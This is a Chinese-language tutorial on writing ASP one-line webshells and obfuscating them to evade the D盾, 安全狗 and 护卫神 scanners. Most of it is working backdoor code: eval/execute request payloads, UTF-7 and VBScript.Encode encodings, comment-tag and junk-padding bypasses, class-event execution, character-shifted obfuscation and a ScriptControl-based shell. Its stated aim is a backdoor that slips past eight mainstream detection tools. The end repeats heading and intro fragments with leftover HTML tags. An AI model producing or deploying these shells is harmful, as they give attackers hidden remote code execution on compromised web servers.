ASP一句话木马免杀技术详解<\/h1>

0x00 前言<\/h2>
随着时间推移，ASP技术逐渐衰落，导致针对ASP网站后门的研究减少。本文详细梳理ASP一句话Webshell的构建方法和免杀技术，目标是构建能绕过8款主流安全检测工具的ASP一句话木马。<\/p>

0x01 ASP执行原理<\/h2>

ASP脚本支持VBScript和JScript两种脚本语言，部署在IIS或PWS服务器上。执行流程：<\/p>

IIS判断请求为ASP脚本<\/li>
通过Isapi模块调用asp.dll解释引擎<\/li>

asp.dll获取脚本内容并解释执行<\/li> <\/ol>

代码块通常包裹在<% %><\/code>标签中，默认使用VBScript解释。也可显式指定语言：<\/p>

<%@ language="VBscript" %>
<script language="VBScript" runat="server">
代码
<\/script>
<\/code><\/pre>
0x02 ASP注释方式<\/h2>
ASP支持五种注释方式：<\/p>

'<\/code> 单引号（单行）<\/li>
REM<\/code> rem+空格（单行）<\/li>
\/\/<\/code> 双斜线（单行，VBscript\/JScript可用，仅IIS）<\/li>
HTML注释符（单行，VBscript可用，仅IIS）<\/li>
\/* *\/<\/code> 多行注释符（JScript可用）<\/li>
<\/ol>
0x03 ASP一句话现状<\/h2>
主要使用三个VBScript函数执行代码：<\/p>
<%eVAl reQuEst(0)%>
<%exECuTe ReqUEst(0)%>
<%eXECutegLobaL rEquEst(0)%>
<\/code><\/pre>
常见隐藏方法：<\/p>
1. UTF-7编码<\/h3>
原始代码：<\/p>
<%@codepage=65000%><%response.codepage=65001:eval(request("LandGrey"))%>
<\/code><\/pre>
编码后：<\/p>
<%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>
<\/code><\/pre>
2. VBScript.Encode编码<\/h3>
原始代码：<\/p>
ExecuteGlobal request("LandGrey")
<\/code><\/pre>
编码后：<\/p>
<%@ LANGUAGE = "VBScript.Encode"IQAAAA==3X+^!YMVK4msPM+5E\/OcrSl [MM+Xrb+AsAAA=
<\/code><\/pre>
0x04 研究思路<\/h2>
当前困难<\/h3>

ASP技术成熟，难找新型技术<\/li>
语法结构简单<\/li>
成熟查杀工具的防范<\/li>
<\/ol>
有利条件<\/h3>

ASP应用减少导致查杀重视度降低<\/li>
多数工具仍依赖正则特征匹配<\/li>
ASP特征库更新不及时<\/li>
<\/ol>
研究方法<\/h3>

收集样本并交叉验证<\/li>
分类分析技术<\/li>
重点研究绕过部分工具的样本<\/li>
深入语法特性挖掘<\/li>
结合手工测试与Fuzzing<\/li>
<\/ol>
0x05 绕过D盾检测<\/h2>
方法一：填充垃圾数据+特殊字符串<\/h3>
关键点：<\/p>

利用注释符<\/li>
使用'%><\/code>和'<%<\/code>闭合标签<\/li>
填充大量<%%><\/code>标签（文件>0.97MB）<\/li>
特定位置插入<??><\/code><\/li>
<\/ol>
示例glorysday.asp<\/code>：<\/p>
<%'%><%%><%%><%%>...<??>...<%%><%%><%execute request("LandGrey")%><%'%>
<\/code><\/pre>
方法二：<!--"--><\/code>注释符<\/h3>
在任何被杀脚本的<%<\/code>和代码之间插入<!--"--><\/code>即可绕过：<\/p>
<%<!--"-->execute request("LandGrey")%>
<\/code><\/pre>
0x06 绕过安全狗检测<\/h2>
方法一：<!--"--><\/code>注释符<\/h3>
同D盾方法二<\/p>
方法二：其他方式<\/h3>

VBscript encode编码<\/li>
请求判断：<\/li>
<\/ol>
<%if Request("LandGrey")<>"" then ExecuteGlobal request("LandGrey") end if %>
<\/code><\/pre>

request变量替换：<\/li>
<\/ol>
<%if request("LandGrey")<>""then session("LandGrey")=request("LandGrey"):end if:if session("LandGrey")<>"" then execute session("LandGrey")%>
<\/code><\/pre>
0x07 绕过护卫神检测<\/h2>
方法一：类初始化事件（极限模式）<\/h3>
<%Class LandGrey 
Private Sub Class_Initialize 
eval(request("LandGrey")) 
End Sub
End Class
Set X = New LandGrey%>
<\/code><\/pre>
方法二：类卸载事件（极限模式）<\/h3>
<%Class LandGrey 
Private Sub class_terminate 
eval(request("LandGrey")) 
End Sub
End Class
Set X = New LandGrey
Set X = Nothing%>
<\/code><\/pre>
方法三：花式语法（通用模式）<\/h3>
<%eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str): Str = Split(Str,"%") 
For x=1 To Ubound(Str) 
fun=fun&Chr(Str(x)-66) 
Next
End Function%>
<\/code><\/pre>
0x08 终极免杀方案<\/h2>
使用CreateObject创建ScriptControl组件执行代码：<\/p>
<%@ language = VBscript 
SET LandGrey = server.CreateObject("mS"&chr(115)&"cR"&chr(105)&"pTCo"&Chr(110)&Chr(84)&"rOL.Sc"&chr(114)&"IpTCo"&Chr(110)&Chr(84)&"rOL.1") 
LandGrey.lANguaGE = cHr(86)&"BsC"&CHR(114)&chr(105)&"PT"
LandGrey.AddObject "REsponse", Response 
LandGrey.AddObject "r"&chr(101)&"quEst", requesT 
LandGrey.AddObject "s"&chr(101)&"ssIon", sessiOn 
LandGrey.AddObject "serv"&chr(101)&"r", serVer 
LandGrey.AddObject "apPlic"&CHR(97)&"tIon", application 
LandGrey.eXECuTeStAtEmENt("eV"&CHr(&0141)&"L"&Chr(40)&"rEqU"&cHr(101)&"St("&chr(34)&"LandGrey"&chr(34)&CHR(41)
<\/code><\/pre>
总结<\/h2>

针对不同工具采用不同绕过策略<\/li>
<!--"--><\/code>可绕过D盾和安全狗<\/li>
类事件可绕过护卫神极限模式<\/li>
字符编码转换可增强隐蔽性<\/li>
CreateObject方法具有最佳兼容性<\/li>
<\/ol>
通过灵活组合这些技术，可以构建出能绕过主流安全检测工具的ASP一句话木马。<\/p>

ASP一句话木马免杀技术详解<\/h1>

0x00 前言<\/h2> 随着时间推移，ASP技术逐渐衰落，导致针对ASP网站后门的研究减少。本文详细梳理ASP一句话Webshell的构建方法和免杀技术，目标是构建能绕过8款主流安全检测工具的ASP一句话木马。<\/p>

0x04 研究思路<\/h2>

0x05 绕过D盾检测<\/h2>

0x06 绕过安全狗检测<\/h2>

0x07 绕过护卫神检测<\/h2>

0x00 前言<\/h2>
随着时间推移，ASP技术逐渐衰落，导致针对ASP网站后门的研究减少。本文详细梳理ASP一句话Webshell的构建方法和免杀技术，目标是构建能绕过8款主流安全检测工具的ASP一句话木马。<\/p>